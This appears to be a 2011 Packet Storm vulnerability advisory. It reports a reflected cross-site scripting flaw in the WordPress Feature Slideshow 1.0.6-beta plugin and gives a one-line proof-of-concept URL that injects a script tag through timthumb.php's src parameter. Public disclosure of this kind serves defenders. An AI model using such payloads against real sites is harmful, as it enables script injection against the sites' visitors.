WordPress Feature Slideshow 1.0.6-beta Cross Site Scripting

2011-01-25T00:00:00
ID PACKETSTORM:97825
Type packetstorm
Reporter AutoSec Tools
Modified 2011-01-25T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................WordPress Feature Slideshow 1.0.6-beta  
Vulnerability...........Reflected Cross-site Scripting  
Download................http://sleek.no/kunder/138  
Release Date............1/24/2011  
Tested On...............Windows 7 + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
------------------------------------------------------------------------  
  
--Description--  
  
A reflected cross-site scripting vulnerability in WordPress Feature  
Slideshow 1.0.6-beta can be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
http://localhost/wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=<script>alert(0)</script>  
`